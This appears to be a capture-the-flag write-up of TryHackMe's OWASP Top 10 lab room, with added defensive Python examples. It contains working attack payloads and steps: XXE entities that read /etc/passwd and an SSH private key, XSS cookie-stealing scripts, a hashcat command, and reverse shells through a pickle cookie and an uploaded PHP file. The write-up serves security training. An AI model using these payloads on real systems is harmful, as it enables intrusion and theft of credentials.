What

“This room breaks each OWASP topic down and includes details on what the vulnerability is, how it occurs and how you can exploit it. You will put the theory into practise by completing supporting challenges.”

Difficulty: Easy

TryHackMe Page

OWASP Page

#1 - Injection

“Injection flaws, such as SQL, NoSQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.”

OWASP Page

Task 5 / Question 1 - What strange text file is in the website root directory?

Start the VM and navigate to http://$MACHINE_IP/evilshell.php

Run ls

Task 5 / Question 2 - How many non-root/non-service/non-daemon users are there?

Use cat /etc/passwd and look for ‘regular’ users

Task 5 / Question 3 - What user is this app running as?

Use whoami

Task 5 / Question 4 - What is the user’s shell set as?

Run grep $username /etc/passwd where ‘$username’ is the answer from Question 3; the shell is the last field of the matching line.
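As an added example (not the room's own material), Questions 2 and 4 as a script over a constructed /etc/passwd sample: it applies the usual Debian/Ubuntu convention that human accounts start at UID 1000, excludes nobody, and treats nologin/false shells as service accounts.

```python
# Constructed sample in /etc/passwd format (not the room VM's real file).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
alice:x:1000:1000:Alice,,,:/home/alice:/bin/bash
bob:x:1001:1001::/home/bob:/bin/zsh
backup-svc:x:1002:1002::/var/backups:/usr/sbin/nologin
"""

UID_MIN = 1000          # Debian/Ubuntu start human accounts at UID 1000
NOBODY_UID = 65534      # 'nobody' sits above the human range but is not a person
NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/usr/bin/false"}

def parse_passwd(text):
    """Yield (name, uid, gid, home, shell) for each well-formed passwd line."""
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue  # skip malformed lines instead of crashing on them
        name, _pw, uid, gid, _gecos, home, shell = fields
        yield name, int(uid), int(gid), home, shell

def regular_users(text):
    """Question 2: human accounts = UID in the login range, not 'nobody', with a real shell."""
    return {
        name: shell
        for name, uid, _gid, _home, shell in parse_passwd(text)
        if UID_MIN <= uid < NOBODY_UID and shell not in NOLOGIN_SHELLS
    }

def shell_of(text, username):
    """Question 4: the login shell recorded for `username`, or None if absent."""
    for name, _uid, _gid, _home, shell in parse_passwd(text):
        if name == username:
            return shell
    return None

if __name__ == "__main__":
    users = regular_users(SAMPLE_PASSWD)
    print(f"{len(users)} regular user(s): {users}")
    print("www-data shell:", shell_of(SAMPLE_PASSWD, "www-data"))
```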

Task 5 / Question 5 - What version of Ubuntu is running?

Retrieve version number with lsb_release -d

Task 5 / Question 6 - Print out the MOTD. What favorite beverage is shown?

Get the answer with cat /etc/update-motd.d/00-header

#2 - Broken Authentication

“Application functions related to authentication and session management are often implemented incorrectly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users’ identities temporarily or permanently.”

OWASP Page

Task 7 / Question 1 - What is the flag that you found in darren’s account?

Simple: register with " darren" (note the leading space), a random email address and a password.

Task 7 / Question 2 - Now try to do the same trick and see if you can login as arthur

Sure, it works.

Task 7 / Question 3 - What is the flag that you found in arthur’s account?

Do the same as with " darren" and you’ll get the flag.
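As an added example (not the room's code), assuming the registration bug is a uniqueness check on the raw string while the account lookup trims whitespace, here is that check beside a hardened one that canonicalizes the name first; the canonical form also catches case and Unicode look-alike variants, which goes beyond the leading-space trick the room uses.

```python
import unicodedata

# Constructed account store keyed by registered name (not the room's real backend).
ACCOUNTS = {
    "darren": {"email": "darren@example.test"},
    "arthur": {"email": "arthur@example.test"},
}

def register_vulnerable(store, username, email):
    """Uniqueness check on the raw string: ' darren' is 'new', lands next to 'darren',
    and (assumption) a lookup that trims whitespace then serves darren's data to it."""
    if username in store:
        raise ValueError("username taken")
    store[username] = {"email": email}
    return username

def canonical(username):
    """One canonical form for every variant a user can type: Unicode compatibility
    normalization (fullwidth letters etc.), whitespace trimming/collapsing, case folding."""
    name = unicodedata.normalize("NFKC", username)
    name = " ".join(name.split())
    return name.casefold()

def register_hardened(store, username, email):
    """Store and compare the canonical form, so ' darren', 'DARREN' and a fullwidth
    'ａrthur' all collide with the existing accounts instead of shadowing them."""
    name = canonical(username)
    if not name:
        raise ValueError("empty username")
    if name in store:
        raise ValueError("username taken")
    store[name] = {"email": email}
    return name

def would_accept(register, store, username):
    """True if `register` lets `username` through against a copy of `store`."""
    try:
        register(dict(store), username, "new@example.test")
        return True
    except ValueError:
        return False

if __name__ == "__main__":
    for variant in (" darren", "DARREN", "\uff41rthur", "mallory"):
        print(repr(variant), "vulnerable:", would_accept(register_vulnerable, ACCOUNTS, variant),
              "hardened:", would_accept(register_hardened, ACCOUNTS, variant))
```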

#3 - Sensitive Data Exposure

“Many web applications and APIs do not properly protect sensitive data, such as financial, healthcare, and PII. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data may be compromised without extra protection, such as encryption at rest or in transit, and requires special precautions when exchanged with the browser.”

OWASP Page

Task 11 / Question 1 - What is the name of the mentioned directory?

Only one folder is mentioned in the HTML source.

Task 11 / Question 2 - Navigate to the directory you found in question one. What file stands out as being likely to contain sensitive data?

Navigate to the mentioned directory; it is vulnerable to directory listing, so you’ll see a file that shouldn’t be visible.

Task 11 / Question 3 - Use the supporting material to access the sensitive data. What is the password hash of the admin user?

By following the supporting material in Task 9, you should be able to extract the password hash from the database file.

Note that the hash is in the 3rd column.

Task 11 / Question 4 - Crack the hash. What is the admin’s plaintext password?

Follow the steps as described in Task 10 to get the plaintext password.

You can also crack the hash locally. First, identify the hash type with hash-identifier; it looks like an MD5 hash.

Save the hash into a txt file. Look up on this page which hash mode you should use for Hashcat to crack MD5. Finally, run Hashcat.

hashcat -m 0 -a 0 -w 3 -O hash.txt /usr/share/wordlists/rockyou.txt

Task 11 / Question 5 - Login as the admin. What is the flag?

Get the flag using the cracked password.

#4 - XML External Entities (XXE)

“Many older or poorly configured XML processors evaluate external entity references within XML documents. External entities can be used to disclose internal files using the file URI handler, internal file shares, internal port scanning, remote code execution, and denial of service attacks.”

OWASP Page

Task 16 / Question 1 - Try to display your own name using any payload

With a small modification of the example in Task 15:

<?xml version="1.0"?>
<!DOCTYPE replace [<!ENTITY name "My Own Name"> ]>
<userInfo>
  <firstName>&name;</firstName>
</userInfo>

Task 16 / Question 2 - See if you can read the /etc/passwd

Indeed, using the example from Task 15 without touching it:

<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>
<root>&read;</root>

Task 16 / Question 3 - What is the name of the user in /etc/passwd

It is the last entry in the passwd file: “falcon”, as the next questions give away.

Task 17 / Question 4 - Where is falcon’s SSH key located?

It is in the default directory with the default filename (run ssh-keygen and check the path it proposes if unsure).

Task 17 / Question 5 - What are the first 18 characters for falcon’s private key

Just a small path modification on the payload we used to retrieve the passwd file:

<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///home/falcon/.ssh/id_rsa'>]>
<root>&read;</root>

You should copy the first 18 characters of the key:

-----BEGIN RSA PRIVATE KEY-----
[copy the first 18 chars from here][rest of the key]
-----END RSA PRIVATE KEY-----
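As an added defensive counterpart (not part of the room or this write-up), the check an XML endpoint should make before any of the Task 16 payloads reach a parser: refuse documents that declare a DTD at all, as the OWASP XXE guidance recommends. Assumes UTF-8/ASCII input (a UTF-16 document would need decoding before the byte check) and uses Python's xml.etree only for the benign case.

```python
import re
import xml.etree.ElementTree as ET

# Any DTD at all is rejected: OWASP's XXE guidance is to disable DTDs entirely, and no
# normal client request to this endpoint needs one. XML keeps these keywords upper-case.
DTD_MARKER = re.compile(rb"<!(?:DOCTYPE|ENTITY)\b")

class UnsafeXML(ValueError):
    """Raised before the document reaches a parser."""

def parse_untrusted(xml_bytes):
    # Assumption: input is UTF-8/ASCII; decode UTF-16 input to bytes in UTF-8 first.
    if DTD_MARKER.search(xml_bytes):
        raise UnsafeXML("DOCTYPE/ENTITY declarations are not accepted from clients")
    return ET.fromstring(xml_bytes)

def first_name(xml_bytes):
    """Return the firstName the client sent, or None; raises UnsafeXML on any DTD."""
    root = parse_untrusted(xml_bytes)
    node = root.find("firstName")
    return node.text if node is not None else None

def is_rejected(xml_bytes):
    try:
        parse_untrusted(xml_bytes)
    except UnsafeXML:
        return True
    return False

# The Task 16 payload shapes from the write-up, plus a benign request (constructed).
FILE_READ = b"""<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>
<root>&read;</root>"""
INTERNAL_ENTITY = b"""<?xml version="1.0"?>
<!DOCTYPE replace [<!ENTITY name "feast"> ]>
<userInfo><firstName>&name;</firstName></userInfo>"""
BENIGN = b"""<?xml version="1.0"?>
<userInfo><firstName>My Own Name</firstName></userInfo>"""

if __name__ == "__main__":
    for label, doc in (("file read", FILE_READ), ("internal entity", INTERNAL_ENTITY), ("benign", BENIGN)):
        print(label, "-> rejected" if is_rejected(doc) else f"-> accepted: {first_name(doc)}")
```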

#5 - Broken Access Control

“Restrictions on what authenticated users are allowed to do are often not properly enforced. Attackers can exploit these flaws to access unauthorized functionality and/or data, such as access other users’ accounts, view sensitive files, modify other users’ data, change access rights, etc.”

OWASP Page

Task 18 / Question 3 - Look at other users notes. What is the flag?

As you log on with the given credentials noot and test1234, you’ll see a note. What you see in the address bar is the textbook definition of IDOR (Insecure Direct Object Reference): the note is selected by a plain number in the URL.

Work on the number that identifies the displayed note. You can try a few numbers manually, or use some automation for a larger pool of numbers. Anyway, just start from the beginning ;)
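Added example, not the room's application: a minimal note lookup in the vulnerable shape (id only) beside one scoped to the logged-in user; the note ids, owners and bodies are constructed.

```python
# Constructed notes store; ids are the plain integers shown in the address bar.
NOTES = {
    0: {"owner": "admin", "body": "[constructed flag placeholder]"},
    1: {"owner": "noot", "body": "noot's own note"},
    2: {"owner": "bob", "body": "bob's shopping list"},
}

class Forbidden(Exception):
    pass

def get_note_vulnerable(note_id):
    """Lookup by id alone: whoever is logged in can read whichever note the URL names."""
    return NOTES[note_id]["body"]

def get_note_hardened(current_user, note_id):
    """Scope the lookup to the caller. 'Missing' and 'not yours' get the same answer,
    so the response does not reveal which ids exist."""
    note = NOTES.get(note_id)
    if note is None or note["owner"] != current_user:
        raise Forbidden(f"note {note_id}")
    return note["body"]

def readable_ids(current_user, ids, hardened):
    """Which of `ids` the user would actually see through each accessor."""
    seen = []
    for note_id in ids:
        try:
            if hardened:
                get_note_hardened(current_user, note_id)
            else:
                get_note_vulnerable(note_id)
        except (Forbidden, KeyError):
            continue
        seen.append(note_id)
    return seen

if __name__ == "__main__":
    print("vulnerable:", readable_ids("noot", range(5), hardened=False))
    print("hardened:  ", readable_ids("noot", range(5), hardened=True))
```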

#6 - Security Misconfiguration

“Security misconfiguration is the most commonly seen issue. This is commonly a result of insecure default configurations, incomplete or ad hoc configurations, open cloud storage, misconfigured HTTP headers, and verbose error messages containing sensitive information. Not only must all operating systems, frameworks, libraries, and applications be securely configured, but they must be patched/upgraded in a timely fashion.”

OWASP Page

Task 19 / Question 2 - Hack into the webapp and find the flag

  • After deploying the VM, we can see the application name.
  • Google for it and follow the first result (should be the GitHub repo of the app).
  • Go through the README.md and find the default credentials at the bottom of the page (“Specifically, this VM focusses on default passwords”).
  • Use those credentials to get the flag.

#7 - Cross-Site Scripting (XSS)

“XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user-supplied data using a browser API that can create HTML or JavaScript. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.”

OWASP Page

Now, this is fun!

Task 20 / Question 2 - … craft a reflected XSS payload that will cause a popup saying “Hello”

Use a very basic payload here:

<script>alert('Hello');</script>

Task 20 / Question 3 - … craft a reflected XSS payload that will cause a popup with your machine’s IP address

Refer to w3schools, the HTML Living Standard or Mozilla on this.

<script>alert(window.location.hostname);</script>

Task 20 / Question 4 - … add a comment and see if you can insert some of your own HTML

First, I tried to insert an HTML element, without luck. Then I inserted a simple horizontal rule, which revealed the next flag.

<hr>

Task 20 / Question 5 - … create an alert popup box appear on the page with your document cookies

Read more on w3schools or Mozilla.

<script>alert(document.cookie);</script>

Task 20 / Question 6 - Change “XSS Playground” to “I am a hacker” by adding a comment using Javascript

First, check page sources and look for the title with “XSS Playground” value (use Ctrl+Shift+C or the “Select an element” icon).

Again, refer to w3schools, Mozilla or StackOverflow. Notice that the XSS vulnerability is mentioned in a comment in the page source.

<script>document.getElementById("thm-title").innerHTML = "I am a hacker";</script>

#8 - Insecure Deserialization

“Insecure deserialization often leads to remote code execution. Even if deserialization flaws do not result in remote code execution, they can be used to perform attacks, including replay attacks, injection attacks, and privilege escalation attacks.”

OWASP Page

Copy the value of the sessionId cookie and decode it in a terminal:

echo "$sessionId" | base64 --decode

(Use double quotes, or paste the cookie value directly; in single quotes the shell would decode the literal string $sessionId.)

Task 25 / Question 2 - 2nd flag (admin dashboard)

Change the value of the “userType” cookie from “user” to “admin”.

Task 26 / Question 1 - flag.txt

Following the task description, change the value of the userType cookie back from “admin” to “user” and return to the myprofile page.

Click on “Exchange your vim”. This creates another cookie, called “encodedPayload”, with some default value. We will update this.

Download pickleme.py from the task description and edit it with your favorite editor. Replace “YOUR_TRYHACKME_VPN_IP”. Also, start netcat listening on port 4444.

Run pickleme.py to generate a base64-encoded payload that will make the remote server connect back to the port on your computer where netcat is listening. Grab the string between the quotation marks.

Update the value of the “encodedPayload” cookie with the output string from the previous step.

Navigate to the feedback page and refresh. This decodes the updated cookie’s value and opens a remote shell to the web server (read the task description).

Don’t be like me: I hadn’t read the description thoroughly, which is why the timestamps and commands on the last screenshot are inconsistent with the previous ones.
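Added example, not the room's code: the three cookies above (sessionId as transparent base64, userType editable in the browser, encodedPayload unpickled by the server) all fail for one reason, the server trusts whatever the client sends back. The hardened shape below serializes with JSON and signs with an HMAC under a constructed key, so the userType edit from Task 25 is detected rather than obeyed.

```python
import base64
import hashlib
import hmac
import json

# Constructed key for the demo; a real deployment loads a random key from configuration.
SECRET_KEY = b"constructed-demo-key-do-not-reuse"

def decode_plain_cookie(cookie):
    """What Task 25 does in the terminal: a base64 cookie is readable by anyone holding it."""
    return base64.b64decode(cookie).decode()

def _b64(data):
    return base64.urlsafe_b64encode(data).decode()

def sign_cookie(payload, key=SECRET_KEY):
    """Serialize with JSON (never pickle) and append an HMAC-SHA256 tag over the body."""
    body = _b64(json.dumps(payload, sort_keys=True).encode())
    tag = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    return f"{body}.{tag}"

def verify_cookie(cookie, key=SECRET_KEY):
    """Return the payload only if the tag matches; None for tampered or malformed cookies."""
    body, sep, tag = cookie.rpartition(".")
    if not sep:
        return None
    expected = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):  # constant-time comparison
        return None
    return json.loads(base64.urlsafe_b64decode(body))

def tamper(cookie, field, new_value):
    """The browser-side edit from Task 25: rewrite one field, keep the old tag."""
    body, _sep, tag = cookie.rpartition(".")
    payload = json.loads(base64.urlsafe_b64decode(body))
    payload[field] = new_value
    return f"{_b64(json.dumps(payload, sort_keys=True).encode())}.{tag}"

if __name__ == "__main__":
    print(decode_plain_cookie(base64.b64encode(b'{"userType": "user"}').decode()))
    cookie = sign_cookie({"userType": "user", "name": "noot"})
    print("valid:   ", verify_cookie(cookie))
    print("tampered:", verify_cookie(tamper(cookie, "userType", "admin")))
```

Server-side session state keyed by a random id removes the client-held payload entirely and is the stronger fix; signing is the minimum when the payload must travel with the client.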

#9 - Using Components with Known Vulnerabilities

“Components, such as libraries, frameworks, and other software modules, run with the same privileges as the application. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applications and APIs using components with known vulnerabilities may undermine application defenses and enable various attacks and impacts.”

OWASP Page

Task 29 / Question 1 - How many characters are in /etc/passwd

There are multiple ways to get a remote shell on this VM. Let me show the short way first.

Open Exploit Database and look for “online book store”. If you search for “CSE bookstore” instead, you won’t find the RCE exploit (that path is described in the long version).

How did I get to “online book store”? Follow the link at the bottom of the home page to projectworlds.in and look for “book store”. Take the first 3 words of the result and drop them into the search bar of exploit-db.

Download and execute the exploit. The only required parameter is the IP of the VM.

Clean and elegant exploit from Tib3rius, follow him on Twitter, Twitch and YouTube.

Job’s done.


Long(er) version.

Yes, I was looking for “CSE bookstore” on exploit-db. There is an authentication bypass exploit that I used to get admin on the website. Use the credentials shown in exploit 48960 (SQL injection on /admin.php).

Start netcat listening on port 4444:

sudo nc -lvnp 4444

Add a new book.

Add details:

  • For ISBN, add an integer as it will be used to identify the book (/books.php?bookisbn=1)
  • For Publisher, select something that already exists in the database
  • As an Image, select your prepared reverse shell payload (containing your IP address and port).

I used a php reverse shell from pentestmonkey, only updated with my VPN IP address and the port where netcat is listening.

Navigate to the books page to activate the payload.

Enjoy the remote shell.

#10 - Insufficient Logging & Monitoring

“Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response, allows attackers to further attack systems, maintain persistence, pivot to more systems, and tamper, extract, or destroy data. Most breach studies show time to detect a breach is over 200 days, typically detected by external parties rather than internal processes or monitoring.”

OWASP Page

Task 30 / Question 1 - What IP address is the attacker using?

We can see a few 401 Unauthorized login attempts in the downloaded logfile. Use the IP address from these lines.

Task 30 / Question 2 - What kind of attack is being carried out?

The logfile makes it obvious: someone is trying default usernames (‘admin’, ‘administrator’, ‘anonymous’, ‘root’) from the same IP address, brute-forcing the login and looking for Broken Authentication.
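Added example, not part of the room: the two questions as detection logic over constructed log lines in combined-log shape (documentation-range IPs, not the real log), flagging a source that fails against several distinct usernames rather than a user who mistypes once.

```python
import re
from collections import defaultdict

# Constructed lines in combined-log shape (documentation-range IPs, not the room's log).
LOG = """\
192.0.2.7 - - [21/Apr/2019:10:21:27 -0700] "GET /index.html HTTP/1.1" 200 1043
198.51.100.4 - dave [21/Apr/2019:10:21:28 -0700] "POST /login HTTP/1.1" 401 2
198.51.100.4 - dave [21/Apr/2019:10:21:35 -0700] "POST /login HTTP/1.1" 200 612
203.0.113.16 - admin [21/Apr/2019:10:21:30 -0700] "POST /login HTTP/1.1" 401 2
203.0.113.16 - administrator [21/Apr/2019:10:21:31 -0700] "POST /login HTTP/1.1" 401 2
203.0.113.16 - anonymous [21/Apr/2019:10:21:32 -0700] "POST /login HTTP/1.1" 401 2
203.0.113.16 - root [21/Apr/2019:10:21:33 -0700] "POST /login HTTP/1.1" 401 2
garbage line that does not parse
"""

LINE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+$'
)

def parse(log):
    """Yield one dict per well-formed line; unparseable lines are skipped, not fatal."""
    for line in log.splitlines():
        m = LINE.match(line)
        if m:
            entry = m.groupdict()
            entry["status"] = int(entry["status"])
            yield entry

def failed_logins_by_ip(log):
    """Question 1: source IP -> usernames that drew a 401 on the login endpoint."""
    failures = defaultdict(list)
    for e in parse(log):
        if e["path"] == "/login" and e["status"] == 401:
            failures[e["ip"]].append(e["user"])
    return dict(failures)

def brute_force_sources(log, min_distinct_users=3):
    """Question 2: several *different* usernames failing from one IP is credential guessing,
    not one user mistyping a password (dave above fails once, then succeeds)."""
    return {ip: users for ip, users in failed_logins_by_ip(log).items()
            if len(set(users)) >= min_distinct_users}

if __name__ == "__main__":
    for ip, users in brute_force_sources(LOG).items():
        print(f"{ip}: {len(users)} failed logins as {', '.join(users)}")
```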